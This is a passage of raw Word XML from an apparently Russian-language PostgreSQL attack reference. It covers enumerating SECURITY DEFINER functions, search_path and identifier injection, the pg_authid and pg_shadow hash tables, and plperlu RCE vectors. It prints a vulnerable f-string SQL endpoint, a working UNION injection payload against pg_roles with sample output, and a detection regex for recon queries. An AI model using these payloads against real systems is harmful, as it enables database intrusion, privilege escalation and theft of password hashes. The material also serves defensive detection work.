          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prosecdef = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — паттерн именно поиска целей для эскалации, легитимный код этой комбинации не делает.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после нормализации — нормализованная форма </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT $1, p.oid::int, ... FROM pg_proc p ... WHERE p.prosecdef = $N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — характерный отпечаток recon-payload-а (Payload A).</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pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в логах от не-DBA роли — атака; функция используется при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_dump --schema-only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и в IDE-плагинах для DBA, для application — нет.</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14–17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без изменений. Структура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стабильна с 7.x; основные колонки совместимы между мажорами.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pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступны PUBLIC на AWS RDS / Google Cloud SQL / Supabase — провайдеры не ограничивают каталог по тем же причинам, что и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(сломает ORM). На managed-инстансах в выборку попадают служебные функции провайдера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rds_*</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cloudsql.*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supabase_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — это, как и в 3.8.1, fingerprint самого провайдера. SECURITY DEFINER функции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-owner на managed обычно сводятся к стандартным extension-функциям (pgcrypto, pg_stat_statements) — реальных кастомных SECURITY DEFINER-целей для эскалации на managed мало, потому что admin-операции делает сам провайдер вне SQL. Детально по провайдерам —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3.8.1</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для разведки таблиц и колонок; обычно атакующий идёт 3.8.4 → 3.8.1 → 3.8.2 → 3.13 (эскалация).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SECURITY DEFINER + SET search_path: основная цепочка эксплуатации того, что нашлось через Payload A. После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE prosecdef = true AND owner=postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> атакующий ищет в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(Payload B) функции без явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path = pg_catalog, pg_temp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это уязвимый паттерн.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Identifier injection в plpgsql. Найденные через Payload B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('%s', ...)</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EXECUTE '...' || ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри plpgsql-функций — прямой путь к 3.16.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3.7.2, 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — plperlu/plpython3u RCE. Список доступных языков (Payload A с JOIN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) определяет, доступны ли эти векторы. Если в кластере нет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WHERE l.lanname = 'plperlu'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает пусто) — 3.7.2 не применим без установки расширения.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3.6.1, 3.6.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — поиск extension-функций (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE p.proname LIKE 'dblink%' OR p.proname LIKE 'postgres_fdw%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) для определения, какие OOB-каналы из 3.6 доступны в кластере.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чтения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pg_get_functiondef</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добавить в тот же regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (предложенный в 3.8.1) ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc|pg_get_functiondef|pg_get_function_arguments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.8.md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Catalogs — pg_proc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Information Functions — pg_get_functiondef / pg_get_function_arguments / pg_get_userbyid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Object Identifier Types — regprocedure / regproc / regrole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CREATE FUNCTION — SECURITY DEFINER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(function enumeration)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pg_proc &amp; function enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.3 pg_authid и pg_shadow — хеши паролей (superuser-only)</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pg_catalog.pg_authid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — единая таблица всех ролей кластера (распространяется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, общая для всех БД). Содержит флаги привилегий (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rolsuper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rolcreaterole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rolbypassrls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rolreplication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">колонку `rolpassword`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с хешем пароля. SELECT на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ограничен SUPERUSER-ом (и предопределённой ролью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с PG 14+). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_catalog.pg_shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — view поверх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с фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rolcanlogin = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, тоже SUPERUSER-only. Для пост-эксплуатации после получения superuser-а (см. 3.13) — Payload B дампит все хеши кластера за один UNION. До получения superuser-а доступно только содержимое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 view, где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всегда замаскирован как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app/api/v1/admin.py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@router.get("/admin/users")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_admin_users(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    role_filter: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f"SELECT id, username, last_login FROM admin_users WHERE role = '{role_filter}'"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Три колонки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timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — типы как раз под </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">oid::int / rolname / rolvaliduntil</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A — `pg_roles` (без superuser, без хешей)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это то, что атакующий получает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> эскалации. Хешей нет, но видны имена всех ролей кластера и их флаги — карта целей для 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `role_filter`):</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rolname || ' [super=' || rolsuper || ' replication=' || rolreplication || ' bypassrls=' || rolbypassrls || ' createrole=' || rolcreaterole || ']', rolvaliduntil FROM pg_roles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username, last_login FROM admin_users WHERE role = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolname || ' [super=' || rolsuper || ' replication=' || rolreplication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            || ' bypassrls=' || rolbypassrls || ' createrole=' || rolcreaterole || ']',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolvaliduntil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_roles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username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP-ответа — все роли кластера с их ключевыми флагами:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres [super=true replication=true bypassrls=true createrole=true]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">appwriter [super=false replication=false bypassrls=false createrole=false]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">appreader [super=false replication=false bypassrls=false createrole=false]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">backup_op [super=false replication=true bypassrls=false createrole=false]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">analytics [super=false replication=false bypassrls=true createrole=false]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что это даёт атакующему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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Точное имя superuser-роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (обычно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но на managed —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специальные на Supabase). Цель для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Роли с `bypassrls = true`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обходят RLS-политики (3.17), в эти роли стоит SET ROLE если получится.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Роли с `replication = true`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
